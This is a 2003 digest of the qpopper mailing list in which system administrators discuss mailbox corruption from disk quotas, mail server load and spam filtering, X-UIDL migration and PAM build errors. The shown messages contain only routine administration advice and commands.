The qpopper list archive ending on 11 Mar 2003
Topics covered in this issue include:
1. Re: Mailbox corrupt by disk quota
Matt Garretson <mattg at assembly.state.ny dot us>
Wed, 05 Mar 2003 14:24:31 -0500
2. Load on Pop/SMTP server (Re: QPOPPER SENDMAIL/PROCMAIL: AND NFS)
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Wed, 5 Mar 2003 14:46:32 -0500
3. Re: QPOPPER SENDMAIL/PROCMAIL: AND NFS
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Wed, 5 Mar 2003 14:57:47 -0500
4. Re: Mailbox corrupt by disk quota
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Wed, 5 Mar 2003 14:59:57 -0500
5. Using the bulldb feature
Rick Kunkel <kunkel at w-link dot net>
Wed, 5 Mar 2003 12:09:21 -0800 (PST)
6. Re: Mailbox corrupt by disk quota
Chris Miller <ctodd at netgate dot net>
Wed, 5 Mar 2003 11:46:48 -0800 (PST)
7. Re: Mailbox corrupt by disk quota
Alan Brown <alanb at digistar dot com>
Wed, 5 Mar 2003 17:38:18 -0500 (EST)
8. Re: X-UIDL
Simon Byrnand <simon at igrin.co dot nz>
Thu, 06 Mar 2003 11:46:26 +1300
9. Re: X-UIDL
Vasilios Hoffman <vhoffman01 at wesleyan dot edu>
Wed, 5 Mar 2003 19:51:05 -0500 (EST)
10. Re: X-UIDL
Simon Byrnand <simon at igrin.co dot nz>
Thu, 06 Mar 2003 14:03:56 +1300
11. Re: X-UIDL
"Alan W. Rateliff, II" <lists at rateliff dot net>
Wed, 5 Mar 2003 20:27:31 -0500
12. configure --with-pam on OSXS 10.2.4 breaks
"Michael Dunston" <mdunston at music.vt dot edu>
Wed, 5 Mar 2003 21:14:23 -0500
13. --disable-status broken ?
Simon Byrnand <simon at igrin.co dot nz>
Thu, 06 Mar 2003 16:37:38 +1300
14. Re: Mailbox corrupt by disk quota
Chris Miller <ctodd at netgate dot net>
Wed, 5 Mar 2003 23:48:28 -0800 (PST)
15. Re: Mailbox corrupt by disk quota
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Thu, 6 Mar 2003 11:43:30 -0500
16. Re: Mailbox corrupt by disk quota
Alan Brown <alanb at digistar dot com>
Thu, 6 Mar 2003 12:22:09 -0500 (EST)
17. Re: Mailbox corrupt by disk quota
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Thu, 6 Mar 2003 12:37:52 -0500
18. starting qpopper
"redlineracerx" <redlineracerx at hotmail dot com>
Thu, 6 Mar 2003 09:47:22 -0800
19. Re: Mailbox corrupt by disk quota
Chris Miller <ctodd at netgate dot net>
Thu, 6 Mar 2003 10:40:26 -0800 (PST)
20. Re: Mailbox corrupt by disk quota
Michael Kolos <michael at colba dot net>
Thu, 06 Mar 2003 13:46:10 -0500
21. RE: starting qpopper
"redlineracerx" <redlineracerx at hotmail dot com>
Thu, 6 Mar 2003 12:31:53 -0800
22. H_e_l_p needed: qpopper doesn't see mail
Shane Bywater <shane at apexia dot ca>
Thu, 06 Mar 2003 18:06:58 -0500
23. Re: H_e_l_p needed: qpopper doesn't see mail
Greg Earle <earle at isolar.DynDNS dot ORG>
Thu, 06 Mar 2003 16:01:51 -0800
24. Re: Indispensable admins (was Re: QPOPPER SENDMAIL/PROCMAIL: AND
Homer Wilson Smith <homer at lightlink dot com>
Thu, 6 Mar 2003 19:39:20 -0500 (EST)
25. Beginner Question
Stephen Larsen <stephen.larsen2 at verizon dot net>
Thu, 06 Mar 2003 21:14:12 -0500
26. Re: Mailbox corrupt by disk quota
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Thu, 6 Mar 2003 21:52:37 -0500
27. Problems with --enable-home-dir-misc
Gustavo Moyano <gustavo at infodoors.com dot ar>
Fri, 7 Mar 2003 11:17:42 -0300
28. Re: H_e_l_p needed: qpopper doesn't see mail
Shane Bywater <shane at apexia dot ca>
Fri, 07 Mar 2003 09:55:23 -0500
29. Re: H_e_l_p needed: qpopper doesn't see mail
Butch Kemper <kemper at tstar dot net>
Fri, 07 Mar 2003 10:39:55 -0600
30. Re: H_e_l_p needed: qpopper doesn't see mail
Shane Bywater <shane at apexia dot ca>
Fri, 07 Mar 2003 12:04:52 -0500
31. Re: H_e_l_p needed: qpopper doesn't see mail
Greg Earle <earle at isolar.DynDNS dot ORG>
Fri, 07 Mar 2003 09:08:44 -0800
32. Re: H_e_l_p needed: qpopper doesn't see mail
Greg Earle <earle at isolar.DynDNS dot ORG>
Fri, 07 Mar 2003 09:24:59 -0800
33. Re: H_e_l_p needed: qpopper doesn't see mail
Mark <admin at asarian-host dot net>
Sat, 08 Mar 2003 06:51:27 GMT
34. --enable-home-dir-misc problems
Gustavo Moyano <gustavo at infodoors.com dot ar>
Mon, 10 Mar 2003 10:05:21 -0300
35. Migrating to hashed directories
Steve Perrault <sperraul at mnsi dot net>
Mon, 10 Mar 2003 12:35:12 -0500
36. Re: --enable-home-dir-misc problems
The Little Prince <thelittleprince at asteroid-b612 dot org>
Mon, 10 Mar 2003 11:09:56 -0800 (PST)
37. Re: Migrating to hashed directories
The Little Prince <thelittleprince at asteroid-b612 dot org>
Mon, 10 Mar 2003 11:14:53 -0800 (PST)
38. Re: Indispensable admins (was Re: QPOPPER SENDMAIL/PROCMAIL: AND
The Little Prince <thelittleprince at asteroid-b612 dot org>
Mon, 10 Mar 2003 11:21:34 -0800 (PST)
39. Re: Mailbox corrupt by disk quota
The Little Prince <thelittleprince at asteroid-b612 dot org>
Mon, 10 Mar 2003 11:24:47 -0800 (PST)
40. QPopper 4.0.x buffer overflow vulnerability (fwd)
The Little Prince <thelittleprince at asteroid-b612 dot org>
Tue, 11 Mar 2003 09:09:14 -0800 (PST)
41. Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Greg Earle <earle at isolar.DynDNS dot ORG>
Tue, 11 Mar 2003 09:49:48 -0800
42. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Greg Earle <earle at isolar.DynDNS dot ORG>
Tue, 11 Mar 2003 10:03:04 -0800
43. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Gregory Hicks <ghicks at cadence dot com>
Tue, 11 Mar 2003 10:18:52 -0800 (PST)
44. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O
Tim Meader <tmeader at cne-odin.gsfc.nasa dot gov>
Tue, 11 Mar 2003 13:09:58 -0500
45. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Greg Earle <earle at isolar.DynDNS dot ORG>
Tue, 11 Mar 2003 10:19:56 -0800
46. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Alan Brown <alanb at digistar dot com>
Tue, 11 Mar 2003 13:22:24 -0500 (EST)
47. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Gregory Hicks <ghicks at cadence dot com>
Tue, 11 Mar 2003 10:49:00 -0800 (PST)
48. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Alan Brown <alanb at digistar dot com>
Tue, 11 Mar 2003 14:41:19 -0500 (EST)
49. Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Greg Earle <earle at isolar.DynDNS dot ORG>
Tue, 11 Mar 2003 10:58:16 -0800
50. Re: The Qpopper 4.0.x exploit
Brad Stockdale <brad at greenepa dot net>
Tue, 11 Mar 2003 16:45:09 -0500 (EST)
Date: Wed, 05 Mar 2003 14:24:31 -0500
From: Matt Garretson <mattg at assembly.state.ny dot us>
Subject: Re: Mailbox corrupt by disk quota
Chris Miller wrote:
> what OS are you running?
AIX 4.3.3 + qpopper 4.0.4 + procmail 3.22
Thanks for sharing your recovery method. On my system, some
of the messages are in the temporary pop drop, and some are
still in the corrupted spool file. I do something like this:
lockfile /var/spool/mail/user.lock
mv /var/spool/mail/user /tmp
mail -f /tmp/user (then just quit out of mail with "q")
cat /var/tmp/pop/.user.pop /tmp/user > /var/spool/mail/user
(at this point i either delete some old messages from the
user's spool file, or increase the user's quota)
chown user.mail /var/spool/mail/user
rm -f /var/spool/mail/user.lock
Loading the spool file into "mail" seems to skip over the corrupted
beginning of the file, so when i quit out it gets saved without
the junk. Maybe next time i will try using tail like you do.
-Matt
Date: Wed, 5 Mar 2003 14:46:32 -0500
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Load on Pop/SMTP server (Re: QPOPPER SENDMAIL/PROCMAIL: AND NFS)
Spamassasin as a milter works well. Cloudmark has
different anti-spam products.
Basically, run anti-spam on another machine and TUNE IT.
With the milter, you can run spamass on another machine
and sendmail elsewhere.
IO load high? Put another spindle in there. Break up
sendmail queues. Put them not on var (where logging is).
Put mail spools for qpopper on another spindle.
Put syslog into async write mode.
Mail burdens are almost always IO. If you've tackled, IO,
there's other stuff, but IO is always that first step.
Filtering burdens are often CPU/RAM.
And 2 machines handling SMTP and both doing Spam Detection
that both deliver to the pop machine give you redundancy,
separate POP performance from 99% of the email.
And tos a note to your government rep just explaining
that spam is costing you hardware, people and general
resources. These spammers are taking money from your
company and the economy.
I want to see spammers caned on Fox TV (perhaps as an
alternate choice to a couple years of hard time for costing
businesses and ISPs billions of dollars).
Now back to dealing with qpopper.
Quoting Simon Byrnand (simon at igrin.co dot nz):
> At 13:16 3/03/03 -0500, Alan Brown wrote:
>
> This is a bit off topic, but....
>
> >On Mon, 3 Mar 2003, Steve Hillman wrote:
> >
> >> At 04:06 AM 3/3/2003 -0500, you wrote:
> >> >The mailserver I had handling 1-2 million messages/day was only a
> >> >k6/400. Tweaking sendmail makes a big difference.
> >>
> >> Just curious - Sendmail and qpopper (or some other popper) on the one
> >box,
> >> or just sendmail acting as an MX?
> >
> >Both on the same box, with some level of spam filtering too - using
> >DNSBLs (light load) and Spam Assassin (tagging only).
>
> Whether you use Spam Assassin for "tagging only" or sorting spam into other
> folders, the load is the same. It is the tests that determine if it is spam
> or not which take most of the CPU time.
>
> >I had to update from a 486 to handle body tagging. Spam Assassin is
> >/bin/sh based so was killing the machine.
>
> Umm, not sure what you mean by /bin/sh based - Spam Assassin is most
> definately Perl based.
>
> >Perl based filtering agents have the same (or worse) problem. The
> >startup load for a dozen parallel perl proceses can quickly kill a
> >ramstarved (< 256Mb) machine.
>
> Which is why Spam Assassin gives you the option of using the spamc/spamd
> client server pair.
>
> One spamd daemon (a full perl copy of spamassassin) runs in the background
> waiting for connections. It uses approximately 15MB of ram, and because its
> running all the time, that is preloaded.
>
> spamc is a very small C program that connects to spamd, and has a
> neglibible startup time or memory footprint. Each spamc request causes
> spamd to fork off a process to handle it, but because of copy on write VM
> there is no startup overhead or memory overhead in forking that new spamd
> child.
>
> >Memory is more important than CPU most of the time - if you start
> >hitting swap, you're only going to run as fast as your hard drives, even
> >if you have a 200GHz Itanium processor from5 years in the future.
Date: Wed, 5 Mar 2003 14:57:47 -0500
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: QPOPPER SENDMAIL/PROCMAIL: AND NFS
Quoting Homer Wilson Smith (homer at lightlink dot com):
> > Why?
> > With Linux, unlikely (NFS is, er, egregious, esp before 2.4.x).
> >
> > Sendmail delivers all mail to one machine. One machihne delivers
> > mail locally which qpopper serves.
> >
> > Anything wrong with that?
>
> Yes, the load engendered by sendmail is being overwhelmed by
> spammers, the load engendered by popper is almost nothing. We want
> the reading to be on one machine that is not under constant strain,
> and also be able to put in more than one round robin sendmail machine,
> as many as necessary to deal with the spam that all deliever valid
> e-mail to the popper machine drives.
Ah! Thanks, you've described your problem now rather than
your beleived solution. We can address the problem in a way
that I think is better (and have done many many times).
Mail comes into you (spam, whatever). You filter it
at one of N boxes with equal value MX records. N can
be 1, 2 is nice for redundancy, but if you need, you add more.
Better to make the machines robust enough to deal with whatever
your run.
DNS and MX records allow's mail delivery to be extremely robust.
All these front machines use a mailertable entry to send all your
mail back to the qpopper machine, which now only gets mail from
your filtering machines.
This mail server machine has minimal load (it gets filtered mail
and puts it in spools).
The edge/filtering machines work like hell. If it gets too high,
you can scale laterally with more machines. Odds are than a 4CPU
DL580 with multiple disks will handle the highest loads unless your
anti-spam software is brutally inefficient.
You may want a non-spam filtering machine to handle SMTP for internal
users. Since Eudora (annoyingly) doesn't look at MX records for
its relay, you can just set an A record for this machine. Don't
allow access from the outside through tcpwrappers, ipfilter/ipfw,
your router, firewalls, whatever.
> Homer
>
> >
> > Quoting Homer Wilson Smith (homer at lightlink dot com):
> > > Running,
> > >
> > > Linux 2.0.38 or 2.4.x,
> > > sendmail 8.8.8 or 8.12.x
> > > procmail 3.22
> > > qpopper 4.0.2
> > >
> > > Is there any way to run qpopper on one machine and sendmail/procmail
> > > on multiple other machines, and allow sendmail/procmail to deliver mail to
> > > drives that popper can read without corrupting mailboxes?
> > >
> > > Pointers to RTFM encouraged as well as direct answers.
Date: Wed, 5 Mar 2003 14:59:57 -0500
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Mailbox corrupt by disk quota
Generally the hardquota should be AT LEAST 2x the softquota.
This lets the box get copied and new messages to arrive.
In these situations, I try to be sure that over-quota errors are
TEMP FAIL e.g. 4xx. Quotae get fixed and you can keep it in queue
for a little while. Nothing like bouncing someones' mail by sending
them some large messages - great DOS.
Quoting Matt Garretson (mattg at assembly.state.ny dot us):
> Chris Miller wrote:
> > what OS are you running?
>
>
> AIX 4.3.3 + qpopper 4.0.4 + procmail 3.22
>
> Thanks for sharing your recovery method. On my system, some
> of the messages are in the temporary pop drop, and some are
> still in the corrupted spool file. I do something like this:
>
> lockfile /var/spool/mail/user.lock
> mv /var/spool/mail/user /tmp
> mail -f /tmp/user (then just quit out of mail with "q")
> cat /var/tmp/pop/.user.pop /tmp/user > /var/spool/mail/user
> (at this point i either delete some old messages from the
> user's spool file, or increase the user's quota)
> chown user.mail /var/spool/mail/user
> rm -f /var/spool/mail/user.lock
>
> Loading the spool file into "mail" seems to skip over the corrupted
> beginning of the file, so when i quit out it gets saved without
> the junk. Maybe next time i will try using tail like you do.
>
> -Matt
Date: Wed, 5 Mar 2003 12:09:21 -0800 (PST)
From: Rick Kunkel <kunkel at w-link dot net>
Subject: Using the bulldb feature
Does anyone know if there is a method wherein one can modify the bulletin
database (we're trying this instead of the .popbull files). We have some
users that have specifically requested to get NO bulletins, and also
sometimes we'd like to change ones they get, or reset their last bulletin
gotten to 0. With the .popbull files, this was relatively easy. With the
bulldb, it seems to be impossible...
Thanks,
Rick Kunkel
Date: Wed, 5 Mar 2003 11:46:48 -0800 (PST)
From: Chris Miller <ctodd at netgate dot net>
Subject: Re: Mailbox corrupt by disk quota
Yeah the one thing I forgot to mention is that I run pine -f
/usr/local/var/mailtmp/.user.pop and remove all the messages marked as
"read".
Regards,
Chris
Chris Miller
NetGate Internet
On Wed, 5 Mar 2003, Matt Garretson wrote:
> Chris Miller wrote:
> > what OS are you running?
>
>
> AIX 4.3.3 + qpopper 4.0.4 + procmail 3.22
>
> Thanks for sharing your recovery method. On my system, some
> of the messages are in the temporary pop drop, and some are
> still in the corrupted spool file. I do something like this:
>
> lockfile /var/spool/mail/user.lock
> mv /var/spool/mail/user /tmp
> mail -f /tmp/user (then just quit out of mail with "q")
> cat /var/tmp/pop/.user.pop /tmp/user > /var/spool/mail/user
> (at this point i either delete some old messages from the
> user's spool file, or increase the user's quota)
> chown user.mail /var/spool/mail/user
> rm -f /var/spool/mail/user.lock
>
> Loading the spool file into "mail" seems to skip over the corrupted
> beginning of the file, so when i quit out it gets saved without
> the junk. Maybe next time i will try using tail like you do.
>
> -Matt
>
Date: Wed, 5 Mar 2003 17:38:18 -0500 (EST)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Mailbox corrupt by disk quota
On Wed, 5 Mar 2003, Chuck Yerkes wrote:
> Generally the hardquota should be AT LEAST 2x the softquota.
>... Nothing like bouncing someones' mail by sending
> them some large messages - great DOS.
And on that note, the maximum allowed message size shouldn't exceed 25%
of the hard quota (ie: half the soft quota)
AB
Date: Thu, 06 Mar 2003 11:46:26 +1300
From: Simon Byrnand <simon at igrin.co dot nz>
Subject: Re: X-UIDL
At 14:20 5/03/03 -0500, Vasilios Hoffman wrote:
>Hi,
>
>I'd like to upgrade from qpopper3.11 to qpopper4.0.4. The only real
>problem I've encountered is that we've been running qpopper3.11 in
>server mode, without it updating the X-UIDL headers on disk.
>
>using qpopper4.0.4 in server mode with update-status-headers turned off,
>we get the same functionality.
>
>BUT the X-UIDL headers calculated by qpopper4.0.4 seem to be different, as
>pop clients will download a second copy when you switch from qpopper3.11
>to qpopper4.0.4.
>
>Is there a known work-around for this? I've been playing on a test-box,
>and if I use a pop client to check mail with popper3.11 not in server mode
>such that it DOES write X-UIDL headers, than switch to a popper4.0.4 in
>server mode, it's fine as it doesn't recalculate the already calculated
>headers.
>
>but this would mean finding a way to force X-UIDL calculation by
>popper3.11 for all the mailspools right before the transition. huge pain
>in the butt, if even plausible to do.
>
>So any ideas? Is there a secret popper-3.11-uidl-compatability mode?
./configure --help
--enable-old-uidl Use old UID encoding
Perhaps ?
Regards,
Simon
Date: Wed, 5 Mar 2003 19:51:05 -0500 (EST)
From: Vasilios Hoffman <vhoffman01 at wesleyan dot edu>
Subject: Re: X-UIDL
> ./configure --help
>
> --enable-old-uidl Use old UID encoding
>
>
> Perhaps ?
>
> Regards,
> Simon
ah. yeah. heh. that would make sense. what ever possesed me to assume
that all options would be documented in that guide.pdf? I'm going to
quietly put some salt on this foot I've got in my mouth, and see if it
tastes better. teach me for reading docs. don't know what I was
thinking.
moronically yours,
-V
p.s. thanks :)
Date: Thu, 06 Mar 2003 14:03:56 +1300
From: Simon Byrnand <simon at igrin.co dot nz>
Subject: Re: X-UIDL
At 19:51 5/03/03 -0500, Vasilios Hoffman wrote:
> > ./configure --help
> >
> > --enable-old-uidl Use old UID encoding
> >
> >
> > Perhaps ?
> >
> > Regards,
> > Simon
>
>ah. yeah. heh. that would make sense. what ever possesed me to assume
>that all options would be documented in that guide.pdf? I'm going to
>quietly put some salt on this foot I've got in my mouth, and see if it
>tastes better. teach me for reading docs. don't know what I was
>thinking.
>
>moronically yours,
>
>-V
>
>p.s. thanks :)
:)
It's not well documented, and I havn't used that option myself. Grepping
the source tree and the only mention of it I can see (apart from in the
configure script itself) is in doc/Relase.Notes.
Might pay to read that as it talks about using the option in conjunction
with --disable-status, although its not clear to me what the right choice
would be...
Good luck.
Regards,
Simon
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: Re: X-UIDL
Date: Wed, 5 Mar 2003 20:27:31 -0500
----- Original Message -----
From: "Simon Byrnand" <simon at igrin.co dot nz>
To: "Vasilios Hoffman" <vhoffman01 at wesleyan dot edu>; "Subscribers of Qpopper"
<Qpopper at lists.pensive dot org>
Sent: Wednesday, March 05, 2003 8:03 PM
Subject: Re: X-UIDL
> At 19:51 5/03/03 -0500, Vasilios Hoffman wrote:
> > > ./configure --help
> > >
> > > --enable-old-uidl Use old UID encoding
> It's not well documented, and I havn't used that option myself. Grepping
> the source tree and the only mention of it I can see (apart from in the
> configure script itself) is in doc/Relase.Notes.
I actually found the option in the manual version of the documentation.
Although it gives a clear indication of the intended purpose, I found that
even using this option in our migration from v3 to v4 manifested the same
behavior.
> Might pay to read that as it talks about using the option in conjunction
> with --disable-status, although its not clear to me what the right choice
> would be...
I don't recall this in the manual, but it might well explain why we still
had the UIDL/message redownload behavior after the upgrade.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
From: "Michael Dunston" <mdunston at music.vt dot edu>
Subject: configure --with-pam on OSXS 10.2.4 breaks
Date: Wed, 5 Mar 2003 21:14:23 -0500
I am attempting to get Qpopper to use the OSXS password server for
account authentication. Has anyone succeeded in this; or been able to
compile Qpopper 4.0.4 with PAM on Mac OSXS 10.2.4?
My 'make' breaks when it hits 'pop_pass.c' for quite a few issues (output
below).
thanks in advance for any suggestions..
----------------------------------------
gcc -c -I.. -I.. -I. \
-I../mmangle -I../common \
-g -O2 -traditional-cpp -DHAVE_CONFIG_H -DDARWIN -DUNIX
pop_pass.c -o pop_pass.o
pop_pass.c:377: warning: `struct pam_response' declared inside parameter list
pop_pass.c:377: warning: its scope is only this definition or
declaration, which is probably not what you want
pop_pass.c:377: warning: `struct pam_message' declared inside parameter list
pop_pass.c: In function `PAM_qpopper_conv':
pop_pass.c:385: `PAM_SYSTEM_ERR' undeclared (first use in this function)
pop_pass.c:385: (Each undeclared identifier is reported only once
pop_pass.c:385: for each function it appears in.)
pop_pass.c:389: sizeof applied to an incomplete type
pop_pass.c:391: `PAM_CONV_ERR' undeclared (first use in this function)
pop_pass.c:396: dereferencing pointer to incomplete type
pop_pass.c:398: `PAM_PROMPT_ECHO_ON' undeclared (first use in this function)
pop_pass.c:399: invalid use of undefined type `struct pam_response'
pop_pass.c:399: dereferencing pointer to incomplete type
pop_pass.c:399: `PAM_SUCCESS' undeclared (first use in this function)
pop_pass.c:400: invalid use of undefined type `struct pam_response'
pop_pass.c:400: dereferencing pointer to incomplete type
pop_pass.c:404: `PAM_PROMPT_ECHO_OFF' undeclared (first use in this function)
pop_pass.c:405: invalid use of undefined type `struct pam_response'
pop_pass.c:405: dereferencing pointer to incomplete type
pop_pass.c:406: invalid use of undefined type `struct pam_response'
pop_pass.c:406: dereferencing pointer to incomplete type
pop_pass.c:410: `PAM_TEXT_INFO' undeclared (first use in this function)
pop_pass.c:411: `PAM_ERROR_MSG' undeclared (first use in this function)
pop_pass.c:412: invalid use of undefined type `struct pam_response'
pop_pass.c:412: dereferencing pointer to incomplete type
pop_pass.c:413: invalid use of undefined type `struct pam_response'
pop_pass.c:413: dereferencing pointer to incomplete type
pop_pass.c: At top level:
pop_pass.c:428: variable `PAM_conversation' has initializer but
incomplete type
pop_pass.c:429: warning: excess elements in struct initializer
pop_pass.c:429: warning: (near initialization for `PAM_conversation')
pop_pass.c:431: warning: excess elements in struct initializer
pop_pass.c:431: warning: (near initialization for `PAM_conversation')
pop_pass.c: In function `auth_user':
pop_pass.c:439: `pam_handle_t' undeclared (first use in this function)
pop_pass.c:439: `pamh' undeclared (first use in this function)
pop_pass.c:447: invalid use of undefined type `struct pam_conv'
pop_pass.c:452: `PAM_SUCCESS' undeclared (first use in this function)
pop_pass.c:476: warning: assignment makes pointer from integer without a cast
pop_pass.c:485: warning: assignment makes pointer from integer without a cast
pop_pass.c:491: `PAM_ESTABLISH_CRED' undeclared (first use in this function)
pop_pass.c:494: warning: assignment makes pointer from integer without a cast
pop_pass.c:501: `PAM_TTY' undeclared (first use in this function)
pop_pass.c:509: `PAM_RHOST' undeclared (first use in this function)
/usr/include/stdio.h: At top level:
pop_pass.c:428: storage size of `PAM_conversation' isn't known
make[1]: *** [pop_pass.o] Error 1
make: *** [popper_server] Error 2
.. . . . . . . . . . .
Michael Dunston
Music and Technology
http://www.music.vt.edu
Virginia Tech School of the Arts
Date: Thu, 06 Mar 2003 16:37:38 +1300
From: Simon Byrnand <simon at igrin.co dot nz>
Subject: --disable-status broken ?
Hi All,
I've just tried compiling Qpopper 4.0.4 with the --disable-status option.
According to the help:
--disable-status to prevent Qpopper from writing 'Status'
or 'X-UIDL' headers (sets NO_STATUS). This forces
UIDs for each message to be recalculated in each
session.
However, as soon as messages are read (and left on the server) an X-UIDL
header is still being written back to the spool under the From line.
What am I missing ?
Can someone also confirm that I have the right idea about this setting - no
Status headers means that two seperate email clients accessing the same
pop3 account are unable to tell whether the other client has already read a
message ?
And (if it was working) would disabling writing X-UIDL and Status headers
back into the mail spool cause a performance boost where you have a large
mail spool and one message is read from a webmail page ?
(Normally deleting no messages, or deleting all messages is much faster
than deleting some messages, I was wondering whether having to write X-UIDL
headers back to the spool would lose this benefit, since the mail spool has
to be modified even if no messages are deleted....)
Regards,
Simon
Date: Wed, 5 Mar 2003 23:48:28 -0800 (PST)
From: Chris Miller <ctodd at netgate dot net>
Subject: Re: Mailbox corrupt by disk quota
Chuck,
this sounds like a great idea on the surface, but this doesn't
prevent people from accumulating more than 10MB of mail, which will
ultimately cause this problem to happen at a higher increment of disk
space, right?
Regards,
Chris
On Wed, 5 Mar 2003, Chuck Yerkes wrote:
> Generally the hardquota should be AT LEAST 2x the softquota.
> This lets the box get copied and new messages to arrive.
>
> In these situations, I try to be sure that over-quota errors are
> TEMP FAIL e.g. 4xx. Quotae get fixed and you can keep it in queue
> for a little while. Nothing like bouncing someones' mail by sending
> them some large messages - great DOS.
>
> Quoting Matt Garretson (mattg at assembly.state.ny dot us):
> > Chris Miller wrote:
> > > what OS are you running?
> >
> >
> > AIX 4.3.3 + qpopper 4.0.4 + procmail 3.22
> >
> > Thanks for sharing your recovery method. On my system, some
> > of the messages are in the temporary pop drop, and some are
> > still in the corrupted spool file. I do something like this:
> >
> > lockfile /var/spool/mail/user.lock
> > mv /var/spool/mail/user /tmp
> > mail -f /tmp/user (then just quit out of mail with "q")
> > cat /var/tmp/pop/.user.pop /tmp/user > /var/spool/mail/user
> > (at this point i either delete some old messages from the
> > user's spool file, or increase the user's quota)
> > chown user.mail /var/spool/mail/user
> > rm -f /var/spool/mail/user.lock
> >
> > Loading the spool file into "mail" seems to skip over the corrupted
> > beginning of the file, so when i quit out it gets saved without
> > the junk. Maybe next time i will try using tail like you do.
> >
> > -Matt
>
Date: Thu, 6 Mar 2003 11:43:30 -0500
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Mailbox corrupt by disk quota
However, using the disk system to enforce mail quota's is inherently
a hack, given that there will be, for a moment, two spools.
The more Right Answer is to have the LDA (procmail, mail.local,
whatever) check the softquota and tempfail (75) if it's over
and tempfail is $CurrentSize + $NewMessage would exceed hardquota.
In a large IMAP server I use (file/message), there are settings
for "allow one message over quota" to let in a message that happens
to exceed quota.
You also probably want a reporting method to alert users when they
are over quota. POP, unfo, doesn't allow an "alert message" like
IMAP. MOst GUI IMAP clients will pop-up a box with an alert.
Alerts I've used include "Server will be down for maint from 9-11PM"
(like a bulletin), but also jobs that run through, determine over
quota and emit a "You are over quota and will not get new mail until
you make some room."
Can Eudora and friends handle something like this via POP?
It wouldn't be too hard for qpopper to inject a (false) message,
like a bulletin, PER USER based on factors like this.
Heck, a per-user bulletin dir wouldn't be hard - deliver one
message from outside the spool and then mark it read.
An external process can create and delete those per-user alerts.
The bulletin routines pretty much cover all the hooks for doing that.
Quoting Chris Miller (ctodd at netgate dot net):
> this sounds like a great idea on the surface, but this doesn't
> prevent people from accumulating more than 10MB of mail, which will
> ultimately cause this problem to happen at a higher increment of disk
> space, right?
>
> On Wed, 5 Mar 2003, Chuck Yerkes wrote:
> > Generally the hardquota should be AT LEAST 2x the softquota.
> > This lets the box get copied and new messages to arrive.
> >
> > In these situations, I try to be sure that over-quota errors are
> > TEMP FAIL e.g. 4xx. Quotae get fixed and you can keep it in queue
> > for a little while. Nothing like bouncing someones' mail by sending
> > them some large messages - great DOS.
> >
> > Quoting Matt Garretson (mattg at assembly.state.ny dot us):
> > > Chris Miller wrote:
> > > > what OS are you running?
> > >
> > >
> > > AIX 4.3.3 + qpopper 4.0.4 + procmail 3.22
> > >
> > > Thanks for sharing your recovery method. On my system, some
> > > of the messages are in the temporary pop drop, and some are
> > > still in the corrupted spool file. I do something like this:
> > >
> > > lockfile /var/spool/mail/user.lock
> > > mv /var/spool/mail/user /tmp
> > > mail -f /tmp/user (then just quit out of mail with "q")
> > > cat /var/tmp/pop/.user.pop /tmp/user > /var/spool/mail/user
> > > (at this point i either delete some old messages from the
> > > user's spool file, or increase the user's quota)
> > > chown user.mail /var/spool/mail/user
> > > rm -f /var/spool/mail/user.lock
> > >
> > > Loading the spool file into "mail" seems to skip over the corrupted
> > > beginning of the file, so when i quit out it gets saved without
> > > the junk. Maybe next time i will try using tail like you do.
> > >
> > > -Matt
> >
Date: Thu, 6 Mar 2003 12:22:09 -0500 (EST)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Mailbox corrupt by disk quota
On Thu, 6 Mar 2003, Chuck Yerkes wrote:
> However, using the disk system to enforce mail quota's is inherently
> a hack, given that there will be, for a moment, two spools.
The only way around system quotas is to have the files in 2 different
partitions, but that is a _huge_ performance hit.
Server mode makes user.pop handling a lot safer, but you need to ensure
that there is no direct access to the spool (eg, pine or mail) (Pine can
be configured to use pop in /etc/pine.conf or /etc/pine.conf.fixed), or
the direct access program.
As Chuck says, pop is not designed for a lot of this high-end stuff.
AB
Date: Thu, 6 Mar 2003 12:37:52 -0500
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Mailbox corrupt by disk quota
System quotae were intended to keep users from storing too
much on the machines in their HOME DIRECTORIES.
That was the intent of quota systems.
So we can use it as a hack to limit mailboxes size. But recall
that it's a hack, so we have to work around some of the quota intent
of offering a hard ceiling. Users don't duplicate their home
directories a lot.
The Right Answer is not to (mis)use the system quotae, but rather,
put the checking in the delivery agent and let it use the soft
quota as an advisory - you could get the info from LDAP if you
wanted. But it's work on your part, at this moment.
Quoting Alan Brown (alanb at digistar dot com):
> On Thu, 6 Mar 2003, Chuck Yerkes wrote:
>
> > However, using the disk system to enforce mail quota's is inherently
> > a hack, given that there will be, for a moment, two spools.
>
> The only way around system quotas is to have the files in 2 different
> partitions, but that is a _huge_ performance hit.
>
> Server mode makes user.pop handling a lot safer, but you need to ensure
> that there is no direct access to the spool (eg, pine or mail) (Pine can
> be configured to use pop in /etc/pine.conf or /etc/pine.conf.fixed), or
> the direct access program.
>
> As Chuck says, pop is not designed for a lot of this high-end stuff.
>
> AB
>
